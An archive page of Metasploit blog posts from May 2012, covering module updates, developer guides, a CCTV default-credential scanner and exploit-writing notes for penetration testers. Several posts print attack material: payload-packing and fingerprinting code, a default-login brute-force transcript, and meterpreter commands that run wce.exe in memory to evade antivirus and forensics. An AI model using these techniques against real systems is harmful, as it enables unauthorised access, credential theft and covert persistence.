Skip navigation
All Places > Metasploit > Blog > 2012 > May

This week in the U.S. is the unofficial start of summer, so that probably explains why it's been a bit of a slow week in the Metasploit community, hacking-wise. We have a few new modules for this week's update, but in addition to those, I'd like to mention a few new resources we've put together for the Metasploit development community.


Docs and Videos


Over the last few weeks, we've been working up some more comprehensive documentation on how to get started in Metasploit development. We now have a complete set up Metasploit Development Environment guide, which will take you from a fresh Ubuntu Linux installation, through a GitHub user creation, ending up with your own clone of the Metasploit Framework. Thanks to community contributor corelanc0d3r for the initial work on nailing down these procedures.


We also have a video demonstration of the same up, thanks to our esteemed tech writer, Thao.You can watch it here, if scrolling through long wiki pages of screenshots isn't your thing. For a lot of people, seeing the steps in action is helpful, since it at least proves that someone was able to step through it once.


Exploit developer sinn3r has put together a list of  common anti-patterns that he sees when sheparding community-contributed modules through to the main Metasploit distribution. This is a great resource for people just starting out writing Metasploit modules -- the Metasploit open source community has evolved a set has a set of local customs and preferences, which is mostly (but not completely) informed by common Ruby coding practices, so sinn3r's document touches on the usual style errors and faux pas that we see in new modules.


Metasploit core developer  egypt took the time to refresh and reorganize Metasploit's README, COPYING, and THIRD-PARTY files. Now, it's a little easier to figure out what's up with Metasploit's usage, hacking guidelines, and distribution goals. More importantly, by splitting out the licensing language from the usage language, the README is a lot more, well, readable.


Finally, we're changing how we credit modules in this blog. We used to go through this process of making a distinction between Metasploit module authors and vulnerability discoverers. Turns out, that can give the impression that the module authors do all of the vulnerability work, which, of course, isn't true. So, going forward, we'll be crediting all parties involved here, just like we do in the Metasploit module browser and the Metasploit user interface. Hopefully, that will clear up any confusion, and incidentally, make it easier to automatically generate the "New Module" section.


Speaking of the new modules, here they are, with links to the Exploit Database.


New Modules





If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.


For additional details on what's changed and what's current, please see the most excellent release notes.

As of version 5 R2, BackTrack comes pre-installed with Metasploit 4.1.4, so it's now easier to use Metasploit Community Edition or Metasploit Pro on BackTrack. Here is how it's done:


  • After BackTrack boots, enter startx to get into the UI.
  • Install BackTrack in a virtual machine using the Install BackTrack icon in the top left corner. This is recommended so that Metasploit remembers its product key; otherwise, you would have to register Metasploit each time.
  • Log in with user root, password toor. Enter startx.
  • In the main menu, open BackTrack / Exploitation Tools / Network Exploitation Tools / Metasploit Framework and select start msfpro, which starts the service for the commercial Metasploit UI.
    BackTrack Metasploit 1.jpg
  • Open the Firefox browser from the Internet menu.
  • Enter the URL https://localhost:3790. Note that the connection must be https.
  • You'll see "This Connection is Untrusted". If the server cannot be reached, the Metasploit server may not be started. Please wait a few seconds and try again.
  • Since the Metasploit UI uses a user-generated, unsigned SSL certificate, Firefox complains that the connection is untrusted. Click on I understand the risks, Add Exception..., and Confirm Security Exception.
  • By default, Javascript is disabled in the Firefox BackTrack installation. You should enable Javascript for https://localhost first. To do this, click on Options... on the bottom right of your screen, and select Allow https://localhost.




  • Enter a username and password, and click Create Account. Click on Register your Metasploit license here!


Firefox on BackTrack is very restrictive with Javascript and redirects, so the registration process is more cumbersome than with a standard Firefox installation. The registration page is hosted on, leverages several background services to generate the product key, and requires Javascript. Here is what you need to do to register the license - please follow the steps precisely:


  • Click on Options... on the bottom right of your screen, and select Temporarily allow all this page.
    allow all.jpg
  • Once again click on Options... on the bottom right of your screen, and select Temporarily allow all this page.
  • Enter your email address and hit Go.
  • Once again click on Options... on the bottom right of your screen, and select Temporarily allow all this page.
  • Hit Go again.
  • You'll see a redirect warning that starts with "Request". Simply ignore it.
  • Close the tab. You should now be back in the Metasploit Web UI




Within 5 minutes of completing the form, you'll receive an email with a product key. Copy it to the Product Key field, then click Activate License. You should now see this success message:




Now that you've registered Metasploit, you have access to the update packages, which give you access to new features, exploits, and bug fixes. To update Metasploit, follow these steps:


  1. In the Administration menu, choose Software Updates.
  2. Click Check for Updates.
  3. Click Install.
  4. Repeat the process until the software update reports that there are no more updates available.


Congratulations, you're good to go!

This week, let's talk about post-modules, since we have two new fun ones to discuss.


Windows PowerShell


Windows PowerShell is a scripting language and shell for Windows platforms, used primarily by system administrators. While untrusted scripts are not allowed to run by default, many users will be tempted to set their execution environments to be pretty permissive. This, in turn, can provide a rich (and almost completely overlooked) post-exploitation playground.


To that end, this update features a PowerShell module post-exploit download and executor (exec_powershell), two PowerShell encoders, a post-module mixin, and a directory to stash sample PowerShell scripts in (under /scripts).


Thanks tons to Boris "RageLtMan" Lukashev for taking the lead on making sure this all works -- he, Spencer McIntyre, and the original research from Nicholas Nam on the subject made this all possible.


For more on PowerShell's features for post-exploitation, see Matthew Graeber's excellent Exploit Monday blog post.




On a slightly sillier note, this release also has sinn3r's surprisingly hilarious "OSX Text to Speech Utility." This module allows attackers to creep out their post-exploitation victims by whispering messages to them (or use any number of other stock OSX voices). While it's mostly for fun, I can see how this module can be part of a counter-phishing training payload -- people may be less likely to click on suspicious links next time if you end up giving them a good talking to via their iPod earbuds.

New Modules


In addition to the post-exploitation modules mentioned above, we have those, we have six new modules this month. In no particular order, we've got:





If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.


For additional details on what's changed and what's current, please see the most excellent release notes.

Hi all. I would like to take a minute to share some of my feelings about my first week here as a full-time Metasploit exploit developer, and share some exploit modules.


First of all, I would like to thank everyone on the the Metasploit team for being so nice to me from the first week, and for helping me with anything I need. They are definitely going easy on me during my first days! Their support allowed me to build two exploits for the team during my first week here:


So today I would like to share some details about these modules, and I hope this will help those who are interested in building exploits using the framework.


This module abuses the SVG 1.1 <script> element, which was discovered by Nicolas Gregoire (@Agarri_FR) and documented in his blog.  After some research at Metasploit, as well as additional discussion with Nicolas, we wrote a module that allows the execution of Java via the Squiggle SVG Browser from Batik. We borrowed the proof of concept written by Nicolas, and the awesome library available in Metasploit to build Java-based exploits. Some interesting Metasploit techniques:

  • The payload is encoded like a jar with Msf::EncodedPayload::encoded_jar() which will provide a Rex::Zip::Jar instance. This class provides all the necessary to build the final jar. The final code would be something like:

paths = [
     [ "Exploit.class" ],
     [ "Exploit$1.class"],

p = regenerate_payload(cli)

jar  = p.encoded_jar
paths.each do |path|
     1.upto(path.length - 1) do |idx|
          full = path[0,idx].join("/") + "/"
          if !({|e|}.include?(full))
               jar.add_file(full, '')

     fd = Msf::Config.install_root, "data", "exploits", "batik_svg", path ), "rb")
     data =
     jar.add_file(path.join("/"), data)

  • In the above code the "Exploit.class" and the "MANIFEST.MF" items are based on the information provided by Nicolas in his blog. The java code to build "Exploit.class" can be found in "external/source/exploits/batik_svg/", which uses a SVG Handler to execute the Java code available on Metasploit to launch its own payloads:


public void initializeEventListeners(SVGDocument document) {
     SVGSVGElement root = document.getRootElement();
     EventListener listener = new EventListener() {
          public void handleEvent(Event event) {
               try {
               } catch (Exception e) {}
     root.addEventListener("SVGLoad", listener, false);

  • The Payload class is the payload loader provided by Metasploit. The code and the binary (in case you need to modify, and recompile the "Exploit.class") can be found in the "metasploit" package available in the "external/source/javapayload" directory.
  • However, there is a downside to this vulnerability.  Even though the <script> element can be abused to execute Java code within the Batik Framework, there is still strict Java permissions that prevent us to execute malicious code (such as a simple exec).  Because of this, the victim machine must disable the "Enforced Security Scripting" option under "Preferences" in Squiggle.


This one is an old buffer overflow in the Oracle Weblogic plug-in for the Apache Web server. There are two more exploits available in Metasploit for the same component written by @pusscat

One nice thing in the bea_weblogic_post_bof module is that it allows to fingerprint the version of the Oracle Weblogic plug-in. It is done by forcing an error with a POST request containing a specially crafted Transfer-Encoding header. Fingerprinting allows you to:

  1. Write a "check()" function to confirm the existence of a vulnerable version before launching the exploit.
  2. Auto-detect the target when exploiting.

The path to the info leak in the assemble of the Oracle Weblogic plug-in can be found here.

Writing a HTTP client for Metasploit is a nice experience, because you can find nearly anything you need under the "Msf::Exploit::Remote::HttpClient" mixin.  As an example, the specially crafted HTTP request to fingerprint the plug-in version, with an incorrect "Transfer-Encoding" header, can be built with the send_request_cgi() function:


my_data = rand_text_alpha(rand(5) + 8)
res = send_request_cgi({
          'method'  => 'POST',
          'uri'    => target_uri.path,
          'headers' =>
               'Transfer-Encoding' => my_data   
          'data' => "#{my_data.length}\r\n#{my_data}\r\n0\r\n",

When managing the result from send_request_cgi() you must remind that it can return nil (due to a timeout for example). In our case if res is not null, the code of the response is a HTTP 200, and the body of the response includes the signature for the Oracle Weblogic plug-in.  The fingerprinting can be done like so:

if res and res.code == 200 and res.body =~ /Weblogic Bridge Message/
     # BEA WebLogic 8.1 SP6 -
     case res.body
     when (/Build date\/time:<\/B> <I>Jun 16 2006 15:14:11/ and /Change Number:<\/B> <I>779586/)
          return "Version found: BEA WebLogic 8.1 SP6 -"
     # BEA WebLogic 8.1 SP5 -
     when (/Build date\/time:<\/B> <I>Aug  5 2005 11:19:57/ and /Change Number:<\/B> <I>616810/)
          return "Version found: BEA WebLogic 8.1 SP5 -"
     when (/Build date\/time:<\/B> <I>Oct 25 2004 09:25:23/ and /Change Number:<\/B> <I>452998/)
          return "Version found: BEA WebLogic 8.1 SP4 -"
     # Check for dates prior to patch release
     when /([A-Za-z]{3} [\s\d]{2} [\d]{4})/
          build_date = Date.parse($1)
          if build_date <= Date.parse("Jul 28 2008")
               return "BEA WebLogic connector vulnerable"   
               return "BEA WebLogic connector not vulnerable"   
          return "BEA WebLogic connector undefined"

So that's all for now. I hope you enjoyed it and be able to share more about exploiting with Metasploit soon!

Exploit Database (DB)At Rapid7, we often get asked what the top 10 Metasploit modules are. This is a hard question to answer: What does "top" mean anyway? Is it a personal opinion, or what is being used in the industry? Because many Metasploit users work in highly sensitive environments, and because we respect our users' privacy, the product doesn't report any usage reports back to us.


We may have found a way to answer your questions: We looked at our web server stats, specifically the Metasploit Auxiliary and Exploit Database, which exploit and module pages were researched the most. Here they are, annotated with Tod Beardley's excellent comments:


  1. MS12-020 Microsoft Remote Desktop Use-After-Free DoS (CVE-2012-0002, MSB-MS12-020): This is the 2012 RDP Bug, where it was implied -- but never proven in public -- that a pre-auth bug in RDP can allow for remote code execution. This is likely the most popular module we have due to both recency bias and because there was an unusual level of spontaneous organization of the Metasploit developer community to search for the correct path to remote code execution. So far, nobody’s gotten RCE yet (in public), but the Metasploit module provides the most clues.

  2. Microsoft Server Service Relative Path Stack Corruption (CVE-2008-4250, MSB-MS08-067): A four year old vulnerability that tends to give the most reliable shells on Windows 2003 Server and Windows XP. It’s also got a great pile of language pack targets. All of Metasploit’s exploits provide US English targeted shellcode, a few might provide Chinese, Spanish, French, or other popular languages; this one has targets in pretty much every language you’ve ever heard of. This exploit is also not ancient, so it’s reasonable to expect to find some unpatched systems in a medium to large enterprise vulnerable to it.

  3. Microsoft Server Service NetpwPathCanonicalize Overflow (CVE-2006-3439, MSB-MS06-040): A six year old vulnerability that’s notable in that there’s no official patch from Microsoft for this on Windows NT 4.0. This was discovered after NT went end-of-life, so if you need remote root on an NT machine (and there are still plenty out there), this is going to be your first choice.

  4. Microsoft RPC DCOM Interface Overflow (CVE-2003-0352, MSB-MS03-026): A nine year old vulnerability that used to be the de-facto standard exploit for Windows machines -- this is the RPC DCom bug, and it affects ancient NT machines. It was most notable in that it was used by the Blaster and Nachi worms to transit networks. It’s now pretty much a case study in stack buffer overflows in Windows, so it’s got a lot of historical value. If memory serves, this was the most reliable exploit in Metasploit v2.

  5. Microsoft Windows 7 / Server 2008 R2 SMB Client Infinite Loop (CVE-2010-0017, MSB-MS10-006): Not sure why this module is popular -- it’s a client side DoS. Historically, it’s a neat DoS, since it demos a bug in Windows 7’s kernel, but all the module does is crash Windows 7 clients after you get a user to connect to you.

  6. Adobe PDF Embedded EXE Social Engineering (CVE-2010-1240): This module exploits CVE-2010-1240 in Adobe Reader. The idea is that you can embed and execute a Meterpreter PE Executable in a PDF, and when the user opens the PDF, surprise shells! Since it’s on this list, it’s probably the most popular social engineering-style module.

  7. Apache mod_isapi <= 2.2.14 Dangling Pointer (CVE-2010-0425): Although this is an exploit in Apache, don’t be fooled! It’s only exploitable on Windows (so that knocks out the biggest chunk of Apache installs at the time of this module’s release), and it’s only a DoS. Again, kind of a mystery as to why it’s so popular.

  8. Java AtomicReferenceArray Type Violation Vulnerability (CVE-2012-0507): This was initially discovered in the wild as a Java 0-day, and this module represented the fevered work of sinn3r and Juan Vazquez, who turned out the first reliable public cross-platform exploit for the bug. The blog post "CVE-2012-0507 - Java Strikes Again" shows a screenshot of Meterpreter sessions on Windows, Ubuntu, and OSX systems. In fact, this may be the first publicly demonstrable Java exploit that Just Works against all three platforms for the vulnerable versions of Java -- no extra configuration or fingerprinting is needed.

  9. Microsoft Windows Authenticated User Code Execution (CVE-1999-0504): The PSExec module is a utility module -- given an SMB username and password with sufficient privileges on the target machine, the user can get a shell. It’s not sexy, but it’s super handy for testing payloads and setup. Even though it’s a lowly #9, I’d bet it’s the most-used module in classroom and test environments.

  10. Microsoft Plug and Play Service Overflow (CVE-2005-1983, MSB-MS05-039): This exploits the Plug and Play service on Windows 2000. This is the exploit that MS06-040 replaced, though until MS06-040, this was the most reliable exploit around for Windows 2000. The Zotob worm used it. Note that while the exploit isn’t 100% reliable, failed attempts had a tendency to trigger a reboot of the target, so the next attempt would be 100% successful. In other words, for some people, the reboot-on-failure is really more of a feature than a bug.


Let us know if you find this ranking interesting so we can continue sharing it in the future. We're excited to see how this list will look next month, and what the major changes will be!


If you want to use any of these exploits right now, you can download Metasploit for free!

This week's update highlights Metasploit modules for embedded operating systems (as opposed to the usual client or server targets), so let's hop to it.


CCTV Security Camera Hacking with Metasploit

Security Camera Hackers


On Tuesday, guest blogger Justin Cacak of Gotham Digital Science talked about his module, cctv_dvr_login. The latest update for Metasploit has it now, so if you happen to run into some of these devices, you can show off all your Hollywood hacking skills by panning and zooming the security camera in the executive washroom. Definitely and eye-popper of an exploit, and we're happy to be able to share the techniques with the open source community. For more details on this nifty attack, see our blog post on this topic and the article about this Metasploit module in Wired magazine!


More SCADA, More Problems


In a related vein, this week's update also has a module for another embedded service, RuggedCom's telnet server. RuggedCom, as the name implies, makes network gear designed for harsh, outdoorsy conditions, so it's used almost exclusively in SCADA deployments. According to the researchers "JC CREW," if you know a RuggedCom device's MAC address, you can calculate the default password. Now, if you happen to be in the same broadcast domain as the device (usually the same LAN, but sometimes a little farther out), you can learn the MAC address just by talking Ethernet to the target device.


However, it's not like you have to go to the trouble to pick the MAC address out of packets from RuggedCom devices -- the vendor helpfully displays the local MAC in the telnet banner. What?


Community contributor Borja Merino put together a Metasploit module to do take advantage of this situation, telnet_ruggedcom. This module greps out the MAC address from the telnet banner, performs the password conversion magic, and stores it off into Metasploit's credential database for later use (say, with the telnet_login module).


Bugs in embedded systems like these have the added bonus for pen-testers in that they are often unpatched for months and years inside an organization. This is partly due to both vendor reluctance to patch, but moreso, because the affected devices are often in hard-to-reach locations, like railyards and oil fields.


New Modules


Other than those, we have added five new modules to our exploit database this month. In no particular order, we've got:





If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.


For additional details on what's changed and what's current, please see the most excellent release notes.

From our guest blogger and Metasploit community contributor Justin Cacak at Gotham Digital Science.


camera_access.pngA new module for the Metasploit Framework, cctv_dvr_login, discovers and tests the security of standalone CCTV (Closed Circuit Television) video surveillance systems. Such systems are frequently deployed in retail stores, living communities, personal residences, and business environments as part of their physical security program. However, many of these systems are vulnerable to exploitation that can allow attackers remote access. Such remote access, enabled by default, can allow not only the ability to view real-time video, but control of the cameras (if supported), and provide access to archived footage.


Most owners of CCTV video surveillance systems may not even be fully aware of the device's remote access capabilities as monitoring may be conducted exclusively via the local video console. This further increases the likelihood of attackers gaining/persisting remote access, with no indication to the owner that their video surveillance system and archived footage may be accessed remotely.


Here at Gotham Digital Science, we often encounter video surveillance systems during penetration testing engagements – some of which may be exposed to the Internet, either intentionally or by accident. With any video surveillance system it is often interesting (and sometimes very important) to find out exactly what cameras are monitoring/recording within the environment. Furthermore, access to such systems can often be utilized to support physical security testing initiatives.


This module targets standalone CCTV video surveillance systems by MicroDigital, HIVISION, CTRing, and a substantial number of other rebranded devices.


msf > use auxiliary/scanner/misc/cctv_dvr_loginmsf auxiliary(cctv_dvr_login) > set RHOSTS => auxiliary(cctv_dvr_login) > exploit

[*] CCTV_DVR - [001/133] - Trying username:'admin' with password:''
[-] CCTV_DVR - [001/133] - Failed login as: 'admin'
[*] CCTV_DVR - [002/133] - Trying username:'user' with password:''
[-] CCTV_DVR - [002/133] - Invalid user: 'user'
[*] CCTV_DVR - [003/133] - Trying username:'admin' with password:'admin'
[-] CCTV_DVR - [003/133] - Failed login as: 'admin'
[*] CCTV_DVR - [004/133] - Trying username:'admin' with password:'1111'
[+] Successful login: 'admin' : '1111'
[*] Confirmed IE ActiveX HTTP interface ( v1,1,3,1):
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


Using the obtained passwords, the attacker can view live and recorded footage and move the camera through a web-based application.


In conclusion, physically monitoring sensitive locations within an environment is an important aspect of a well-rounded information security program. However, at the same time such video surveillance devices can themselves be a risk and are often overlooked during security audits and vulnerability/penetration tests. This module exploits one of the common types of standalone CCTV video surveillance systems in use globally. It is likely that other manufacturers and CCTV devices are similarly vulnerable.


Companies who want to protect against this type of attack should change default vendor passwords, use strong passwords, filter access to only trusted hosts, and only expose the CCTV system to the Internet if absolutely necessary. In addition, security professionals can use the new Metasploit module to scan their network for vulnerable systems.


If you’d like to get the technical details about this new Metasploit module, check out the Gotham Digital Science Blog.


The new CCTV module is already available in the Metasploit Framework. Simply download Metasploit and update to the latest version using the command msfupdate. The module will be added to the commercial Metasploit editions as a part of the normal release cycle later this week.

This week's update features a great big pile of Java source code, a makeover for a perennial favorite feature, and a handful of new exploits. Read on, or just skip all the yadda yadda and download Metasploit here.


Armitage Source


This week's biggest change in terms of LOC (lines of code) is the inclusion of the Armitage source code, in external/source/armitage. For a while now, we've been distributing Raphael Mudge's Armitage front-end for the Metasploit Framework, but the source has been over in; that makes for a disconnected experience for developers who might want to fix up Armitage bugs or experiment with new functionality. Now that we've got the source in the Metasploit distribution proper, that should make life easier for everyone. You can read lots more about Armitage at Raphael's site,


Psnuffle refresh


James "egypt" Lee pulled in Alex Malateaux's update for Psnuffle this week as well, so now pnsuffle can eavesdrop on NTLMv2 connections and store those credentials away for later reuse. This update triggered a code cleanup on the rest of psnuffle in general, which brings a couple of heaping handfuls of small bugfixes. For some background on what all psnuffle can do in terms of credential eavesdropping, check the video demo from Max Moser.


New Modules


Only four new modules this week, but the PHP module by HD Moore and egypt is kind of a big deal. If you run a PHP-powered site, you might want to check this right away.


php_cgi_arg_injection by HD Moore and egypt exploits CVE-2012-1823 in PHP.

mozilla_nssvgvalue by Lincoln and corelanc0d3r exploits CVE-2011-3658 in Mozilla Firefox.

solarwinds_storage_manager_sql by sinn3r, exploits OSVDB-81634 in SolarWinds Storage Manager.

vlc_mms_bof  by sinn3r and juan, exploits CVE-2012-1775 in VLC prior to 2.0.0.




If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.


For additional details on what's changed and what's current, please see the most excellent release notes.

The purpose of this post is to point out a little-known jewel -- the -m flag to meterpreter's execute command. The help tells us that this flag causes the executable to "Execute from memory" but that doesn't really explain it. Here's an example of the -m option in action:


meterpreter > cd %systemroot%
meterpreter > cd system32
meterpreter > pwd
meterpreter > download cmd.exe
[*] downloading: cmd.exe -> cmd.exe
[*] downloaded : cmd.exe -> cmd.exe
meterpreter > execute -H -m -d calc.exe -i -f cmd.exe
Process 572 created.
Channel 5 created.
The system cannot find message text for message number 0x2350 in the message file for Application.

Copyright (c) 2009 Microsoft Corporation.  All rights reserved.



Background that shell, type ps, and you'll notice there is a calc.exe process and no cmd.exe process. So what's happening here? First, we're downloading cmd.exe from the system. This isn't necessary if you already have a copy from another system. Next, we're executing calc.exe as a dummy executable and uploading another executable to run in its process space instead. On the target, this works by starting calc.exe in a suspended state, then using the Windows debugging API to rip out its guts and replace them with an executable we supply from the attacker machine.


Using the in-memory executable technique has a few major advantages. First, the name of the file doesn't show up in a process list so things like Task Manager will display it as whatever normal system executable you picked for the -d option. That's pretty important for staying undetected in the presence of a watchful eye. Second, the executable never touches disk. Avoiding writing executables to disk also means forensics is a bit harder -- there's no suspicious prefetch entry for a new executable, there's no new files or altered modification times. The executable itself could leave behind telltale evidence, of course, but every little bit helps. Staying entirely in memory means AV doesn't get another chance to catch us. Anti-Virus generally doesn't like a lot of the tools you often find very handy, such as Windows Credential Editor, so running them in memory gives you another option to avoid that nuisance. Here's what it looks like:


meterpreter > upload wce.exe
[*] uploading  : wce.exe -> wce.exe
[*] uploaded   : wce.exe -> wce.exe
meterpreter > ls wce.exe
[-] stdapi_fs_stat: Operation failed: The system cannot find the file specified.


AV decided wce.exe was evil and deleted it before we had a chance to get what we came for.  Let's try it in memory:


meterpreter > execute -H -m -d calc.exe -f wce.exe -a "-o foo.txt"
Process 3216 created.
meterpreter > cat foo.txt


Another advantage that might not be quite so obvious is that this is a means of getting a cmd.exe shell even if cmd is disabled or removed on the target. GPO preventing you from getting what you need? Just upload it into memory and carry on like nothing happened.

Hey, it's the first post-Metasploit 4.3.0 update, which means that I'm back in the blogging business. Huzzah!


We've all been heads-down for a while getting this bad boy out the door, so while there's not a ton of new functionality to talk about this week, we do have some neat new modules, and one API change for module developers.


Wake On LAN


"The most secure computer is the one that's not turned on," is an old computer security adage, speaking to the complexity of modern operating systems and applications. Unfortunately, this is no longer true, thanks to Wei "sinn3r" Chen's new Wake-on-LAN module.


Wake-On-LAN is a feature of some NICs that allow system administrators to remotely power on computers in the local broadcast domain. For many sites, this is equivalent to the LAN, so you can power on a machine from across the room or down the hall. Now that you can accomplish this same task from within Metasploit, it can be kind of spooky and funny.


Now, imagine walking into a site that went all bridge-network crazy, for example to forward DHCP requests. In such an environment, you'll now be able to power on machines that the client didn't realize was reachable -- say, across VLANS. That can make for a powerful demonstration of why bridging networks might not be such a good idea.


Smarter Print_* Methods


During and since the 4.3.0 release, we've been trying to nail down what a standard print statement ought to look like in the context of a Metasploit module. To that end, James "egyp7" Lee has refreshed all the print_* methods for HTTP browser modules to automatically prepend messages with a sensible client IP address. What this means is, if you're in the business of writing browser exploits, you would no longer write something like:


  print_status("#{} Sending Applet.jar to #{cli.peerhost}:#{cli.peerport}...")


You should instead simply write:


  print_status "Sending Applet.jar"


This will result in the console messages:


  [*]    java_rmi_connection_impl - Sending Applet.jar
  [*]        vlc_mms_bof - Sending malicious page


This is nice because if you're running several browser exploits and have several potential targets, it's much easier to tell who's actually getting your exploits. Clients behind NATs are still difficult to distinguish in a human-readable way, but if you have good ideas on how to solve that problem, feel free to submit patches. (: Over the next few updates, all Metasploit print_* methods should end up with some sensible defaults for communication like this, which should make life easier for both module developers and users alike.


Other New Modules


Finally, sinn3r and friends have been busy knocking out new exploits for this week's update.





If you're new to Metaspoit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.


For additional details on what's changed and what's current, please see the most excellent release notes.

Filter Blog

By date: By tag: